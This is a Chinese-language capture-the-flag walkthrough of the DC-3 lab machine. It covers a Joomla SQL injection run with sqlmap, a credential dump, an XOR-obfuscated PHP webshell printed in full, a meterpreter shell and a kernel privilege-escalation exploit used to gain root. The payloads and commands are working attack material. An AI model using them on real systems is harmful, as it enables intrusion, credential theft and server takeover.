目录
前言
首先大家一定要记住,所有未经授权的渗透都是违法的,所以大家切勿一通乱黑,被关进橘子有的哭了。我们可以在本地搭建一些本地靶场,比如Dvwa
项目介绍
靶机:172.16.10.31
攻击机:172.16.10.13;172.16.10.26
一、信息收集
1.主机发现
2.端口扫描
3.服务详情扫描
二、漏洞利用
1.访问web
主页告诉我们该靶机只有一个flag,要想拿到flag必须获得root权限
This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge. :-)
2.获取Web框架信息
3.nikto扫描
使用nikto对该站点进行扫描,看一下有哪些漏洞或者文件
└─# nikto -h 172.16.10.31
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 172.16.10.31
+ Target Hostname: 172.16.10.31
+ Target Port: 80
+ Start Time: 2024-01-02 20:19:35 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2047
+ /administrator/: This might be interesting.
+ /bin/: This might be interesting.
+ /includes/: This might be interesting.
+ /tmp/: This might be interesting.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8910 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2024-01-02 20:19:55 (GMT8) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
报告结果
172.16.10.31 / 172.16.10.31 port 80 |
Target IP | 172.16.10.31 |
Target hostname | 172.16.10.31 |
Target Port | 80 |
HTTP Server | Apache/2.4.18 (Ubuntu) |
Site Link (Name) | http://172.16.10.31:80/ |
Site Link (IP) | http://172.16.10.31:80/ |
URI | / |
HTTP Method | GET |
Description | /: The anti-clickjacking X-Frame-Options header is not present. |
Test Links | http://172.16.10.31:80/ http://172.16.10.31:80/ |
References | X-Frame-Options - HTTP | MDN |
URI | / |
HTTP Method | GET |
Description | /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. |
Test Links | http://172.16.10.31:80/ http://172.16.10.31:80/ |
References | Missing Content-Type Header Detected on Web Application | Invicti |
URI | /images |
HTTP Method | GET |
Description | /images: IP address found in the 'location' header. The IP is "127.0.1.1". |
Test Links | http://172.16.10.31:80/images http://172.16.10.31:80/images |
References | Private IP addresses disclosed - PortSwigger |
URI | /images |
HTTP Method | GET |
Description | /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". |
Test Links | http://172.16.10.31:80/images http://172.16.10.31:80/images |
References | CVE-2000-0649 |
URI | / |
HTTP Method | HEAD |
Description | Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. |
Test Links | http://172.16.10.31:80/ http://172.16.10.31:80/ |
References |
URI | / |
HTTP Method | ULIJVHGE |
Description | /: Web Server returns a valid response with junk HTTP methods which may cause false positives. |
Test Links | http://172.16.10.31:80/ http://172.16.10.31:80/ |
References |
URI | / |
HTTP Method | DEBUG |
Description | /: DEBUG HTTP verb may show server debugging information. |
Test Links | http://172.16.10.31:80/ http://172.16.10.31:80/ |
References | Enable debugging for ASP.NET apps - Visual Studio | Microsoft Learn |
URI | /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc |
HTTP Method | GET |
Description | /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval. |
Test Links | http://172.16.10.31:80/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc http://172.16.10.31:80/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc |
References | CVE-2004-2047 |
URI | /administrator/ |
HTTP Method | GET |
Description | /administrator/: This might be interesting. |
Test Links | http://172.16.10.31:80/administrator/ http://172.16.10.31:80/administrator/ |
References |
URI | /bin/ |
HTTP Method | GET |
Description | /bin/: This might be interesting. |
Test Links | http://172.16.10.31:80/bin/ http://172.16.10.31:80/bin/ |
References |
URI | /includes/ |
HTTP Method | GET |
Description | /includes/: This might be interesting. |
Test Links | http://172.16.10.31:80/includes/ http://172.16.10.31:80/includes/ |
References |
URI | /tmp/ |
HTTP Method | GET |
Description | /tmp/: This might be interesting. |
Test Links | http://172.16.10.31:80/tmp/ http://172.16.10.31:80/tmp/ |
References |
URI | /LICENSE.txt |
HTTP Method | GET |
Description | /LICENSE.txt: License file found may identify site software. |
Test Links | http://172.16.10.31:80/LICENSE.txt http://172.16.10.31:80/LICENSE.txt |
References |
URI | /icons/README |
HTTP Method | GET |
Description | /icons/README: Apache default file found. |
Test Links | http://172.16.10.31:80/icons/README http://172.16.10.31:80/icons/README |
References | https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ |
URI | /htaccess.txt |
HTTP Method | GET |
Description | /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed. |
Test Links | http://172.16.10.31:80/htaccess.txt http://172.16.10.31:80/htaccess.txt |
References |
URI | /administrator/index.php |
HTTP Method | GET |
Description | /administrator/index.php: Admin login page/section found. |
Test Links | http://172.16.10.31:80/administrator/index.php http://172.16.10.31:80/administrator/index.php |
References |
Host Summary |
Start Time | 2024-01-02 20:45:40 |
End Time | 2024-01-02 20:46:00 |
Elapsed Time | 20 seconds |
Statistics | 8910 requests, 0 errors, 16 findings |
Scan Summary |
Software Details | Nikto 2.5.0 |
CLI Options | -h 172.16.10.31 -Format html -o nikto_report.html |
Hosts Tested | 1 |
Start Time | Tue Jan 2 20:45:40 2024 |
End Time | Tue Jan 2 20:46:00 2024 |
Elapsed Time | 20 seconds |
可以看到是一个joomlak框架,知道是Joomla框架,搜索是否存在该版本漏洞CVE-2017-8917
└─# searchsploit joomla | grep 3.7
Joomla! 1.5.x - 404 Error Page Cross-Site Scripting | php/webapps/33378.txt
Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit) | php/remote/38797.rb
Joomla! 3.7 - SQL Injection | php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component actualite 1.0 - 'id' SQL Injection | php/webapps/5337.txt
Joomla! Component ARI Quiz 3.7.4 - SQL Injection | php/webapps/46769.txt
Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection | php/webapps/42387.txt
Joomla! Component Cmimarketplace - 'viewit' Directory Traversal | php/webapps/8367.txt
Joomla! Component com_alert - 'q_item' SQL Injection | php/webapps/33771.txt
Joomla! Component com_aml_2 - 'art' SQL Injection | php/webapps/33795.txt
Joomla! Component com_as - 'catid' SQL Injection | php/webapps/33766.txt
Joomla! Component com_cb - 'cat' SQL Injection | php/webapps/33796.txt
Joomla! Component com_cbcontact - 'contact_id' SQL Injection | php/webapps/35745.txt
Joomla! Component com_d-greinar - 'maintree' Cross-Site Scripting | php/webapps/33757.txt
Joomla! Component com_facegallery 1.0 - Multiple Vulnerabilities | php/webapps/34754.py
Joomla! Component com_informations - SQL Injection | php/webapps/37774.txt
Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities | multiple/webapps/37767.txt
Joomla! Component com_jphoto - 'id' SQL Injection | php/webapps/10367.txt
Joomla! Component com_jresearch - 'Controller' Local File Inclusion | php/webapps/33797.txt
Joomla! Component com_macgallery 1.5 - Arbitrary File Download | php/webapps/34755.py
Joomla! Component com_memorix - SQL Injection | php/webapps/37773.txt
Joomla! Component com_photoblog - Blind SQL Injection | php/webapps/11337.txt
Joomla! Component com_realestatemanager 3.7 - SQL Injection | php/webapps/38445.txt
Joomla! Component com_seek - 'id' SQL Injection | php/webapps/33756.txt
Joomla! Component com_shop - SQL Injection | php/webapps/35797.txt
Joomla! Component com_tax - 'eid' SQL Injection | php/webapps/34708.pl
Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection | php/webapps/13979.txt
Joomla! Component DM Orders - 'id' SQL Injection | php/webapps/33474.txt
Joomla! Component EShop 2.5.1 - 'id' SQL Injection | php/webapps/41387.txt
Joomla! Component HD FLV Player - 'id' SQL Injection | php/webapps/33673.pl
Joomla! Component J2Store < 3.3.7 - SQL Injection | php/webapps/46467.txt
Joomla! Component JE auction 1.6 - 'eid' SQL Injection | php/webapps/41337.txt
Joomla! Component JE Messanger - SQL Injection | php/webapps/41347.txt
Joomla! Component jLike 1.0 - Information Leak | php/webapps/43977.php
Joomla! Component Job - SQL Injection | php/webapps/11307.txt
Joomla! Component Jobads - 'type' SQL Injection | php/webapps/33478.txt
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection | php/webapps/44117.txt
Joomla! Component JoomRecipe 1.0.4 - 'search_author' SQL Injection | php/webapps/42347.txt
Joomla! Component JSP Tickets 1.1 - SQL Injection | php/webapps/43978.txt
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download | php/webapps/43913.txt
Joomla! Component JVideoClip 1.5.1 - 'uid' SQL Injection | php/webapps/38777.txt
Joomla! Component Map Locator - 'cid' SQL Injection | php/webapps/35788.txt
Joomla! Component OrgChart 1.0.0 - Local File Inclusion | php/webapps/12317.txt
Joomla! Component ProofReader 1.0 RC9 - Cross-Site Scripting | php/webapps/33377.txt
Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection | php/webapps/42589.txt
Joomla! Component Rapid-Recipe - Persistent Cross-Site Scripting | php/webapps/14327.txt
Joomla! Component RSfiles 1.0.2 - 'path' File Download | php/webapps/4307.txt
Joomla! Component Soccer Bet 4.1.5 - 'cat' SQL Injection | php/webapps/41327.txt
Joomla! Component Sponsor Wall 1.1 - SQL Injection | php/webapps/15367.txt
Joomla! Component User Bench 1.0 - 'userid' SQL Injection | php/webapps/43357.txt
Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion | php/webapps/31708.txt
Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection | php/webapps/43974.txt
Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection | php/webapps/43976.txt
Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection | php/webapps/43975.html
发现存在SQL注入漏洞,打开查看漏洞详情,发现可以使用sqlmap进行注入
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
4.脱库
[21:09:45] [INFO] fetching database names
[21:09:45] [INFO] retrieved: 'information_schema'
[21:09:45] [INFO] retrieved: 'joomladb'
[21:09:45] [INFO] retrieved: 'mysql'
[21:09:45] [INFO] retrieved: 'performance_schema'
[21:09:45] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
5.枚举joomladb数据的所有表
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
6.枚举#__users表中的所有字段
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| name | non-numeric |
| email | non-numeric |
| id | numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
读取username和password内容
Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
得到的密码是经过加密的,接下来解密这一串密文
的到密码为:snoopy
7.登入后台
用拿到的用户和密码登入后台,如下所示表示成功登入
8.Getshell
上传木马,这里可以使用一句话木马,如果在高度安全的环境下,建议使用加密木马,这里就不上传了,直接创建一个木马文件
<?php
@error_reporting(0);
function Decrypt($data)
{
$key="e45e329feb5d925b";
$bs="base64_"."decode";
$after=$bs($data."");
for($i=0;$i<strlen($after);$i++) {
$after[$i] = $after[$i]^$key[$i+1&15];
}
return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>
连接木马
三、提权
先反弹一个msf,选择自己喜欢的方式就行,也可以用bash反弹一个会话,这里为了便于提权就使用msf
反弹成功如下图所示
开始提权
meterpreter > shell
Process 1752 created.
Channel 0 created.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/var/www/html/templates/beez3$
www-data@DC-3:/var/www/html/templates/beez3$ whoami
whoami
www-data
www-data@DC-3:/var/www/html/templates/beez3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
因为现在我们还是www-data权限,得想办法得到root权限,这里只用两种方法可以
方法一、
获取当前操作系统的版本信息
获取当前操作系统的发行版信息
看到当前版本是Ubuntu 16.04, 去searchsploit寻找一下漏洞
根据上面收集到的信息过滤无用信息
不知道用哪一个的话一个一个试,当使用下面这个漏洞时发现可以成功提权为root
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | linux/local/39772.txt
1、下载exploit
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
2.上传exploit
将下载的exploit上传到服务器,这里直接在攻击机上搭建一个web服务器,然后在目标服务器上使用wget命令从攻击机上下载这个exploit
解压39772.zip文件,在将其里面的exploit解压,解压完后执行下面命令即可
www-data@host:~/ebpf_mapfd_doubleput$ ./compile.sh
www-data@host:~/ebpf_mapfd_doubleput$ ./doubleput
执行id后发现已经是root权限了
进入root目录,找到flag
四、持久化控制
略
五、清理痕迹
略
总结
总的来说,进行渗透测试需要执行一系列的步骤,包括信息收集、漏洞探测和利用、访问控制测试以及后门访问。最后,根据发现的漏洞提出修复建议,总结测试过程,为提高系统安全性提供指导和建议。